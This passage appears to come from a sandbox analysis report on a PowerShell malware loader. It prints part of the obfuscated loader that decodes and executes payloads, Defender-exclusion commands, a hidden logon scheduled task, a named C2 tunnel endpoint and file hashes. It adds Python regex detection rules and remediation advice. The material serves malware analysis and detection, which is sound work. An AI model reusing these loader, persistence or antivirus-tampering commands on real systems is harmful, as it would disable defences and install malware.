'')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
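Both detonations show the same chain in the process command lines: cmd.exe echoes the loader body into a `-w hidden` PowerShell, a logon scheduled task named `Windows_Log_<n>_str` runs a .vbs from `AppData\Roaming` with `-RunLevel Highest` and `-Hidden`, four `Add-MpPreference` calls exclude powershell.exe and `C:\Users\Public\Runtime Broker.exe` from Defender, `net file` runs before the loader (it fails without admin rights, a common elevation check), and a temp .bat calls `timeout`. Only the `Windows_Log_<n>` number and the temp file name change between the win10 and win11 runs, so rules keyed on the verbs rather than the names survive both. The Python below is an added detection example, not part of this report: a set of regex rules over process-creation command lines (collected from Sysmon Event ID 1 or Windows 4688 with command-line auditing, which is an assumption about the telemetry) with ATT&CK tags chosen here, run over command lines quoted from the behavioral1 tree, a shortened stand-in for the loader line built from the page's own `execute_function`, and one constructed benign line. The C2 host `movie-buddy.gl.at.ply.gg:40572` in the Network section is a playit.gg tunnel endpoint, so the reusable network indicator is the `ply.gg` suffix rather than the tunnel IP.

```python
"""Command-line triage rules for the loader and persistence chain seen in this report."""
import re
from typing import Dict, List, Tuple

# (rule name, ATT&CK technique, pattern). Names and tags are chosen here, not the sandbox's.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("cmd_echo_piped_loader", "T1059.001",
     re.compile(r'cmd\.exe\s+/S\s+/D\s+/c"\s*echo\s+function\s+\w+\(\$', re.I)),
    ("powershell_hidden_window", "T1564.003",
     re.compile(r'powershell(\.exe)?"?\s+-w(indowstyle)?\s+hidden\b', re.I)),
    ("reversed_string_method_call", "T1027.010",
     re.compile(r"::\('[A-Za-z0-9]+'\[-1\.\.-\d+\]\s+-join\s+''\)")),
    ("reflective_assembly_load", "T1620",
     re.compile(r"\[System\.Reflection\.Assembly\]::\('daoL'")),
    ("defender_exclusion_added", "T1562.001",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b", re.I)),
    ("hidden_logon_task_highest", "T1053.005",
     re.compile(r"Register-ScheduledTask.*-AtLogon.*-Hidden.*-RunLevel\s+Highest", re.I | re.S)),
    ("task_action_script_in_appdata", "T1053.005",
     re.compile(r"-Execute\s+'[^']*\\AppData\\[^']*\.(vbs|js|bat|ps1|cmd)'", re.I)),
    ("net_file_elevation_probe", "T1548",
     re.compile(r"(^|\\)net1?(\.exe)?\s+file\s*$", re.I)),
    ("timeout_delay", "T1497.003",
     re.compile(r"(^|\\)timeout(\.exe)?\s+\d+\s*$", re.I)),
]

# Command lines quoted from the behavioral1 process tree; the cmd.exe line is a shortened
# stand-in that keeps only the loader's execute_function (the real line is far longer).
REPORT_CMDLINES = r'''
C:\Windows\system32\cmd.exe /S /D /c" echo function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);} "
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_9_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
net file
C:\Windows\system32\net1 file
timeout 3
'''.strip().splitlines()

# Constructed benign line: ordinary admin use of PowerShell must not fire any rule.
BENIGN_CMDLINE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile Get-Process'


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern fires on one command line."""
    return [name for name, _tech, rx in RULES if rx.search(cmdline)]


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Rule name -> command lines it fired on, for a batch of process-creation events."""
    hits: Dict[str, List[str]] = {}
    for cmd in cmdlines:
        for name in match_rules(cmd):
            hits.setdefault(name, []).append(cmd)
    return hits


def verdict(hits: Dict[str, List[str]]) -> str:
    """'high' when Defender is tampered with and a logon task is installed in the same batch,
    'medium' for any single rule, 'none' otherwise. Thresholds are chosen here."""
    tamper = "defender_exclusion_added" in hits
    persist = "hidden_logon_task_highest" in hits or "task_action_script_in_appdata" in hits
    if tamper and persist:
        return "high"
    return "medium" if hits else "none"


def techniques(hits: Dict[str, List[str]]) -> List[str]:
    """Sorted ATT&CK technique IDs for the rules that fired."""
    return sorted({tech for name, tech, _rx in RULES if name in hits})


if __name__ == "__main__":
    h = triage(REPORT_CMDLINES)
    for name, cmds in h.items():
        print(f"{name}: {len(cmds)} hit(s)")
    print("verdict:", verdict(h), "| techniques:", ", ".join(techniques(h)))
```

The `verdict` pairing matters more than any single rule: `Add-MpPreference -ExclusionPath` alone is something admins do, and a hidden logon task alone is how some installers behave, but the two together from an unsigned script in a user profile, within the same minute, is the pattern this sample leaves. Exclusions added this way survive reboots, so remediation has to remove them from Defender as well as deleting the task, the Run key and the Startup .lnk.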
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
Files
memory/2272-0-0x00007FFDFEE33000-0x00007FFDFEE35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzuaoncl.0nj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2272-10-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-9-0x0000029CC9FD0000-0x0000029CC9FF2000-memory.dmp
memory/2272-11-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-12-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
memory/2272-13-0x0000029CCA420000-0x0000029CCA466000-memory.dmp
memory/2272-14-0x0000029CCA000000-0x0000029CCA008000-memory.dmp
memory/2272-15-0x0000029CCA010000-0x0000029CCA022000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs
| MD5 | 0654dd1a454d5c2b847dce0f59f5b922 |
| SHA1 | bea6406190f36107f5fbad51498fcfbd62367020 |
| SHA256 | 42ff0396b3f9accbb6fe993139b377dfa0291b4c8e27930aa86406fbbaf02fdf |
| SHA512 | c36b6c6ccc8fac3ef0f8477315a7d7ba864691e1620633c4926827ec8ef0ed4274ab5e2efc09f573a70388356b46c43768fc12a3443e4c2988ffac8435921143 |
C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat
| MD5 | 1e16a3b0237093cea53d9dff9593c17a |
| SHA1 | 4227feac46a1a00827029d784442ca250c3d27b1 |
| SHA256 | 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833 |
| SHA512 | 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b49b4568e58d92adb2364d63f8e93e40 |
| SHA1 | 2f3ea5c739d4bf93fc706580e91a284d05f8809f |
| SHA256 | 4d684f3c0fdaf79abec51fb181b2aef1a9ce532408bdc06d6aa6b0c114b699e7 |
| SHA512 | 2054bf5fc94786910886410a32b3e80a72d6cbc297c8126129c898048224825f520aa134287040abfc19864e672ed2d56ba1dd4ec5e0efca87b2e5c8182da050 |
memory/3508-43-0x0000025B71C40000-0x0000025B71C52000-memory.dmp
memory/3508-44-0x0000025B71ED0000-0x0000025B71EE6000-memory.dmp
memory/2272-45-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f65feb0fbbd0fcb9da91d117a38e4f31 |
| SHA1 | 95b1256dd050df6d555a4d06d4dc7ac542b6a070 |
| SHA256 | cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c |
| SHA512 | 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9030854a24cf37b7b4e3650aac67d427 |
| SHA1 | 27f3e35705bbe6388da04bf97e09da1875a6bc71 |
| SHA256 | e818d49edbec3553b77c8a400c04fc88b601614946c281fc9c86acf9498010e0 |
| SHA512 | f402098f60d99d7e7130095c6965bb540454ff9867e72a9c2efaf833967639b802f193f9e73af53829167b43a2d9100e19f9056621f75543fa2aadad1e185dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a116d56b723a0d248b5a38cbc3429288 |
| SHA1 | 75efdbe43b0db5b4b4761166e1a6926316715f54 |
| SHA256 | f17648922a442aed77374620c12e8a0fb492290a191204ccdb1eca3dcf2d6258 |
| SHA512 | a19db0a5120a5857571ec2593d80e9d78405a9fb4bee0f358c8dca484d1f2760d79cdb9a7abfd48db1175d09be6b190e0d02837f59cc10f212215f16b14986c0 |
C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat
| MD5 | 2e33c6b784aa31150c78fd6063e3a88a |
| SHA1 | 4c0af3d16cb4a4a5b8f3433b642b086066da5218 |
| SHA256 | d93f9bbb1e7613b7d354be6333a7a5eac2c3019c626d9f00973d4bdb697906ae |
| SHA512 | 4db0eb6184b5afa3314d01d98652cb8e74a1dfe1f5632fe79b92a8c6c1e0bcd8630f02165e4034b26ea49f1b567f63f296981d3b658e24383895a3b68695b338 |